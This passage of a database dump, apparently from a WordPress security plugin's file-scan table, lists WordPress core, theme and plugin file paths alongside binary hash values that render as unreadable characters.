��&','mrO�z�Iy�Dz��q�v�˘qZ�����i�','',0,'?'),('�{\rՍ.0��`�On��','wp-admin/images/about-header-brushes.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�:Uy-�ܴ#','��{�kZxS?�t\"Q���?�(�n�r3��','',0,'?'),('�x�D�.���m~<�2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[��M�ɞ�yP��','�@����S��y\'�N+�k�B��3�J!PbƖ�','',0,'?'),('뭷\r�!z}ML�K�E','wp-includes/ms-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('��Sڰp��GMǯ�l�','wp-includes/css/media-views.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5w�pأ����','3ֳ���}��!p�B����A����)k�{�F�','',0,'?'),('�2�|�?�]���ϸ�','wp-includes/css/dist/nux/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�L��g�a�J\\','��)��v5i�B�:#��%����N�����','',0,'?'),('���׮F��p�s��4�','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]����H��','���9퇥)R�$px#��q ������{#L�O�','',0,'?'),('��vA�ds�����K�]','wp-admin/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xS���v�N���','�� u�����yA�Ү�B���(��B6�����','',0,'?'),('��YC��o�oR�亞�','wp-includes/capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Iu,�I��WN�7','<�P�ёxC�eo�I)O_d�/�wg�w�1�','',0,'?'),('��H�ն�#$�fu�\0|�','wp-content/themes/magazine-hoot/js/jquery.lightSlider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ū�!�cu|L���tw','��ꁸی�Bup�R�S�aD_s5�?�L�o\\�','',0,'?'),('�}���������','wp-content/themes/magazine-hoot/hybrid/extend/css/admin-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Na֢R�~L�u����tY','2�(���Q���o�-i-��`C-�u�b.���\n�','',0,'?'),('�ۅnPE6��T����','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KdW���ؿE�W��','�R��W].da����s��JM�Lq+p�},�','',0,'?'),('�+��^�њ��\r�k','wp-content/plugins/wp-cerber/assets/flags/is.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4o�$�^z1�T�ɪ�','�XƠ8�\'��*ӱ4�$���G\"��JD8�@�6','',0,'?'),('�8�ڧ��s}�ն�Ni','wp-includes/class-phpmailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F!;� 2󱻱4�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('�?����h�����;','wp-includes/js/quicktags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':}���҈P��٭�','=���/���f2A|��d���<��z�N�K=�','',0,'?'),('�D\rh}�����!\n','wp-includes/js/jquery/ui/effect-drop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�Pط��悇̺ƴ$@�','wp-includes/SimplePie/HTTP/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':p��d\'�$�/','��=�D��=u�~�Ju`�Y[�#*�Γ�','',0,'?'),('�e�y���+\'�g�=w\Z','wp-content/themes/magazine-hoot/hybrid/css/admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�q�)b+�����n�*�','�*;���o@���\ZZb�3��&�,��u��N�','',0,'?'),('�}(^��8,~hyg���','wp-content/plugins/wp-cerber/wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[k�nG���ˡ\"14a','��)Y�.=��E)�#�V W8!E7LOl�','',0,'?'),('�|�`y�YĶ�����o','wp-content/themes/twentytwentyone/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��446ZN�p���T','=SmV��5�9�H�bS�V�u��b��:r�?���','',0,'?'),('��c��.D�r� |��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���Z�?f.��8��	','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('춝��mʹ�����','wp-content/themes/magazine-hoot/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����H뛨�|�o��P','��MM�$�[)Qb*d���������N���U','',0,'?'),('츃�v��6�;�~�','wp-includes/js/tinymce/utils/mctabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('��!<����B4\ZS�}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�@ަ�$����,','�dٍ|�]���Q��!�Qw����;���`7Zf','',0,'?'),('�[���Ӄ��2�W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�I5�)��JD��\\','��w5ޏ���+>�c\r����^⽍B�]�','',0,'?'),('�-x�(�E�oI�=�','wp-includes/class-wp-customize-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('�Ư��0~\rjA4u','wp-includes/css/customize-preview-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('�\\�S�Շ��8��;2','wp-includes/class-wp-tax-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}���nBJw�k�0','��,�In����\n��׋�E,��@�h�1����','',0,'?'),('���mה��F@$�~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ofl��A�7�A���','�L���9w����v�G�hK!g�n��g�Cd','',0,'?'),('�N��\'�!\rB�j��3�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H��!#���>b�W��','�&�x��w�α�h��)�œ@5m��.)9�R','',0,'?'),('�OR(ǹ����O��','wp-content/themes/twentytwenty/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�S�a�N���x0�e\\','\ZY_��tz�)8��b#���D}%]��Dmy��YV�','',0,'?'),('�]��@�\n��>ĺ�Yn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}d��D��TN�\"F�','F�ԝ�q��`�멾���r_���Ȩ_���\'��I','',0,'?'),('���I0��B,�hʛp','wp-includes/class-wp-term-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\"������4XYt[','��m⟮/�a�Ͳ(yMG.��dЪZ+����','',0,'?'),('�������賮]','wp-includes/customize/class-wp-customize-code-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('�Z�\Z�5\n�j�}�@','wp-includes/blocks/buttons/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���9���D?_�7E','��Y]K܊�QS駤��k;�	ͥ�{/ʅ�j�','',0,'?'),('�F�����m���','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<��>sZ�K�z�e','�̆;�n�E��!��Z�\ZV��V H��w','',0,'?'),('�Z�\ZaYH\0 �5�~ ','wp-admin/includes/class-wp-automatic-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Wŝ#���\"Z��Ɣ]E','f?��Y4e��+���~�ěw�K7�w�Mu���','',0,'?'),('�QR\"��@3��v�S','wp-admin/js/link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�֞`�1ٕx�w��','����^���R+Ȝ�I5S$i���\0����2�','',0,'?'),('�G� ��~���`�','wp-includes/customize/class-wp-customize-nav-menu-name-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('��f�W�4���%���','wp-content/plugins/wp-cerber/assets/flags/nz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X	�7�7��c.�ujߖl','4ȯYI4�T)��H�;�rd�Q��g���Ӆ','',0,'?'),('��M�B�!:�','wp-content/plugins/wp-cerber/assets/flags/it.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{/�z]�>��F@�B�','ⴟ��k �9b��md6�l�{e� o���','',0,'?'),('��\Za�]]�A��\'h���','wp-admin/network/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iҎ�L�>�e�*�.��','�+Vƃ/�gyg>��\'$�L*yXc� �w�a5','',0,'?'),('����=�c�ه���','wp-admin/includes/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\\ƥ�/��','�+�w}�U�K�f�%f�q��荁��im��\Z��','',0,'?'),('��eC����Di!��','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��s�[0�\n��2-�','a����RC�J)�!�{Mt@�B}�\n�G�5��\0','',0,'?'),('���f�%u�P���','wp-includes/js/mce-view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<��@^�P�\'','#��	��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('�\Z���{:\Z���4f','wp-includes/js/customize-preview-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�.�z��&���.�1y��','wp-includes/css/dist/format-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���A8�x��l�','K�cK��&�2�\0���=��g�.�ٜ��	\0y','',0,'?'),('�yѼ5��!*�� ��','wp-content/themes/twentytwentyone/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gd�w���}�$\'e�','E�u)��l��E�4����觏�篓�W���zF','',0,'?'),('��N���F�V�Y�C','wp-includes/blocks/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0t�	�ڨ.�j�','{��bw\n~��4�n\"��\"�����#.m�/#1','',0,'?'),('��uy�؟�uV��@/��','wp-includes/class-wp-block-patterns-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�>�O^��\"����','͊�Y��V�y���}��&m�{�5jJ)0�!','',0,'?'),('����D��nk���','wp-content/themes/twentytwentyone/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wu�e\Z�A�K�	m�','Uř�����!¿r�Iq�q�[�j�BCY�Pl%','',0,'?'),('�@}&�J~�¾&��\0','wp-includes/customize/class-wp-customize-new-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('�H\Z���.���hR�bn','wp-content/plugins/wp-cerber/assets/flags/io.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<���e�e���C�','��ɫ-�)i�l�\na�1��}!�}~����	pd�','',0,'?'),('�Y^~5~��p�G-���','wp-includes/js/customize-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('�rI����ɀ5 �F�','wp-includes/Requests/Exception/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��z�� J�^�','����ĺ�̌��&���ֳ���4@78���p','',0,'?'),('�u_����~!\0�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY�99�2���','���6���\Z/���p�y5��E�ح���O�E','',0,'?'),('�z������|�z�xv','wp-includes/js/jquery/ui/droppable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('����˕��r&�q�Fi','wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�Q�)�˸�:-*','��8}�ު�]��\"1���&(��䙄�����','',0,'?'),('�;��+�&Y��Đ','wp-content/plugins/wp-cerber/assets/multi/multi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z/�Wn�U#֬��V�K','��\"��%����6�rH��B)�xf�L]4t��','',0,'?'),('リQ�����)B\n�,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��{Ob�UW~�Y˙','p8�\'���	t���:�Q�o]{5G1����E��','',0,'?'),('��P��a`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i��S-MؼF�N','m\Z�Lչ����ο�1m�aɤ�Rr�1A7','',0,'?'),('��X=U�pfp���Z','wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5��H\nC8h��:��N','I�\r�u}��؁���Yw�Su:<IF���','',0,'?'),('�ތt+�\\�+�Xa�ZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L�n�?2��a~��','�+p��=���ͨ�\'�Bk���@Cr\'ͺ�\'','',0,'?'),('�㯩�	\'��ި��V','wp-includes/images/smilies/icon_biggrin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��Jr��:�]kI�|',':������ٔ���M����X%	�<8�g4�','',0,'?'),('��6X�Ԫ4��[_��=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wz�PQQ�#�Z>\0��D�','���i:��i`�\"��J��%<:���I��xcJ','',0,'?'),('��c��G���(`E��','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �������Q��L','���R21�?nj*=bͥ}�����X&��M��Ʒ','',0,'?'),('��9��r�Mԧ��','wp-includes/js/customize-preview-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('� �ލ<:9�|��6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_�b�->O��\\苃','�sɔg�%��riC��P��w��%��{��J��','',0,'?'),('���6)Jo*��Nn+','wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?с;��9�A����t�\n','�k���O�{d��PS���\0M�\"B]�\"�E��','',0,'?'),('�$�ī�I�^��3���','wp-admin/menu-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P�j�v�˨!ң�','w��9=̠F5d��oU���\\_�k[�','',0,'?'),('�I/\Z�N�2�����p','wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��|v�}�9S�9S','\n,,Y�B��:�En������4�f\r�,��Zbq','',0,'?'),('�g-�_F�\"���~�\\^T','wp-content/plugins/all-in-one-wp-security-and-firewall/images/success.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t	I �C@g���','�(��(�	(\'S)\0B��_}&l�&�o^s�','',0,'?'),('�N ���iiڭ�','wp-includes/random_compat/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[q�7d�v���z�','\'֪��*	[\0EE*J�r�V�s�����c�?','',0,'?'),('��y�u�n���c[٧�','wp-includes/sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gG�xN�)�/���*','�%��S�i����x3�k���O��nz]���','',0,'?'),('�з&�L۽¨��VN�','wp-includes/css/buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('�����9�$�DS�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-points-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=5�gB����!b��','W��#nl3��P� r �l��c=א/ȑ��O:','',0,'?'),('����6$[���O�','wp-admin/css/customize-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%\'d	\\������sPu�','���o^	��I���_qJ�s��=�-+����','',0,'?'),('���rp.u�3zx�','wp-admin/includes/class-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����c�Z*l3��$�','�B�1ô�	ͥ��5 �Q�������9�J','',0,'?'),('�&�?.\r�s��;�=9','wp-content/themes/twentynineteen/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}D�&��J����','z<����@���I�W�JP\n�T^tۜ�E�','',0,'?'),('�&[��>j���/��GU','wp-includes/js/dist/token-list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]L\'9jl7��[#�','�\"�Gc��iL���z5�DwN�#G��ZT{*s}�','',0,'?'),('�7s�\\]�}�AA�we1�','wp-admin/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RC7�\n����TR�','v\'S�;��[�\nS�/[S6�&�G&�Ɩ8�','',0,'?'),('�8���םG2��*Ğ�','wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`L�1�Rg<�1�&�','g΀�0��!r�(��)�uT�T^۽S���Vv�','',0,'?'),('�Z/���{Lt�ծF$�','wp-admin/js/svg-painter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�\'�;I6��U+�K�','A�Οն<��ލ��&0��>�k]�-GfN�','',0,'?'),('�Z�t�\0#(1�','wp-content/themes/magazine-hoot/hybrid/inc/functions-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�݇���/,��43��l�','Lm��O��8.��{�G���۹�>���%\n�','',0,'?'),('�v�:�D�Y�G','wp-includes/js/plupload/plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('�TY�PpE�w��','wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�POůJ�~�l�.�J','�o���`|?�0�5���q����_	!-+}Q�V-�','',0,'?'),('��4�����$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i@�\\�`=�y�7\0','���-\020�[��5�B���c��^V�u8��k�','',0,'?'),('��\0�skk�Tu3So\\�','wp-content/plugins/wp-cerber/assets/flags/mw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��a�D�o�=hs','4[����Պ\'6N���RP��15��}\Z��s�','',0,'?'),('�絛�zy���>_+�t','wp-includes/class-wp-user-meta-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('���H�r #�w/�:4','wp-includes/js/dist/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Eg���Zm\Z��4\0�','�ьZ;�9�c`.�Є�7��7�S��Z?��mߜ','',0,'?'),('�,����U(�e�jR.XP','wp-content/plugins/wp-cerber/assets/flags/aq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�1\n�����x����','wp-includes/blocks/latest-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i{�$F�ČPի!','\Z:����F��s�K�����\\��W����\r��','',0,'?'),('�?��E_�)�xڅ$��','wp-admin/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�#1���@伫֝k','y�\"pB�c�h��\0�PhD�Rd��\0bKO��','',0,'?'),('�d�To�f��ҷ�bS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1q��X}k8�','����\ZI(�b��ܚo��ߍ�9�\0�	ȅE2','',0,'?'),('�j��\nj<�c�@B�X','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�q�טw�U��ͰR�','�JwYw�u�n��[���&D�FLV-�2L���','',0,'?'),('�po���X0%������','wp-includes/css/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��d�(�*ț��K��','���$��l#��X#u��>�G�j�I;ߗ߮','',0,'?'),('�u;Ȍ0�q�w��=��','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8q�X�n�_�tҐi�','Sb�O��m����/IQ>SĊW�ɖT�oV�+a','',0,'?'),('���jK�&����Y','wp-content/plugins/akismet/class.akismet-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�&+�!�]�M�','���iK�I�]�#:6���o�EP�\n�nR$���\r','',0,'?'),('�$c{�97^І�J�g','wp-includes/js/dist/server-side-render.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�o�i)=�\"p�Jhl','m��z��}ힳ�M��|N�b����Zi�-','',0,'?'),('��ŕ��oi|}��','wp-includes/block-supports/custom-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؚ�WiY�C��v�G','� #rCҗ�)�[�ȫ�R̞[���Q�\\�&��','',0,'?'),('�M�٦M�/`�','wp-includes/js/swfupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('򱠭��B�R�z��Y','wp-includes/js/jquery/jquery.table-hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�go����~i�I	�','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('�?{o_���\'�n�','wp-admin/images/resize-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{3VV��FV�f�%K','懴y2q��Z�o��~��([��`\0`C�i\ZL\'','',0,'?'),('���_f $�O<o','wp-admin/js/common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�ϋOny&��-���n',',�#�]�d���!�I|�4<�n�ނ�r\0,�','',0,'?'),('��%�\0��z�f�N�pS','wp-includes/js/tinymce/plugins/wpemoji/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('��w�+\"+�$��^�','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WN ;ƶxv��/	�','K�PQn\"�_(�X/4S�䖏C�9�yA�K�L','',0,'?'),('��\Z�B V�݄�K��','wp-content/plugins/wp-cerber/assets/flags/gi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',����K]�0ȥR�','/��i�fh���r���Z(b��2�\Z�>˾�->','',0,'?'),('��w(�\'�s�y��:6','wp-content/themes/twentynineteen/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�س���T��+W�','\roh}�}i��V�A�ԁ�H�!v�>4}��M','',0,'?'),('��֏�+=���#�Jn','wp-content/plugins/wp-cerber/assets/flags/wf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��iq*��@R��r�\n','}����A���xhI�z�T]�A�s�0;�y�E','',0,'?'),('���<�fÃ�y\0�Y','wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z�.�ʹ�ˆ�g�','\"�e۰�}�)�s��ѓʫt[�\"�i����/V�','',0,'?'),('�#\\���/�vXR','wp-admin/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~^_��\r}��V_�)x','�?l�;�t�F|t�9u�����.&{Y,A��','',0,'?'),('�V�<��r\nQ�]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���*Nf�ټ{��','i��˶|1���v.4[�(�����m@f>��','',0,'?'),('�[�!�r\"�8WU6vp','wp-content/themes/magazine-hoot/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�Ij��8�!r�&��','�<g�4�{�K���]8Ns|����q�_�j','',0,'?'),('�]��€Mp vP���','wp-content/plugins/wp-cerber/assets/flags/id.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\'�!�*�HkV��\0��<','~\0`�v��o\\ETZ�eᜊ�z�eA�`�[HF�','',0,'?'),('�c�E%D���	��雩','wp-content/themes/twentynineteen/sass/blocks/_blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�clF�,C>v�W���','bx�͗߇��J�Ne���������@RP','',0,'?'),('�lF����c뒕�L���','wp-admin/js/iris.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�0!2�}�=��n��','�K��<<�6[��0�j�0��vg������J=�','',0,'?'),('��,�o�!�z�j\"�','wp-admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Cqw=��*c�$[�','�6V�s4�s=T���,�ˇ4{w��m��z','',0,'?'),('�ؠ]�f���P��','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vb�*���\nog�D�','�o����Ч���$E�71�8�K�I�E','',0,'?'),('��V�.`Jxbe�y��','wp-content/themes/twentytwentyone/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�����k�dɐʎs','L�$0��霕A��]`��H�X\"	���q4�\'','',0,'?'),('�\Z�kD��ӖaL=[V','wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rDŽ\"����TJχٖp�','�����LJ�լ@~���\")���?A��<�','',0,'?'),('�N�����s�','wp-includes/customize/class-wp-customize-custom-css-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('�̵��%�0i2�','wp-content/themes/twentynineteen/sass/mixins/_utilities.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�����7��','��/C�ܰ��/ŏ�@��X��Y!C�','',0,'?'),('���w)�Ä��dž�','wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���WY�~�H�#�]','�r����{��\ZI�5�O1���Q��Ӈ���C��','',0,'?'),('��S�A@=�Y���v','wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��NG���:��l','hKu�)$�cU��o>��ᦐ���6�����','',0,'?'),('�����➞��^՘R�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o������h�g[','��߁.�-h4`9S _\r�)I�(��W��','',0,'?'),('�V��k9۴�s���ֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʝ��\'��dwgZ�|�','b!��&f�a�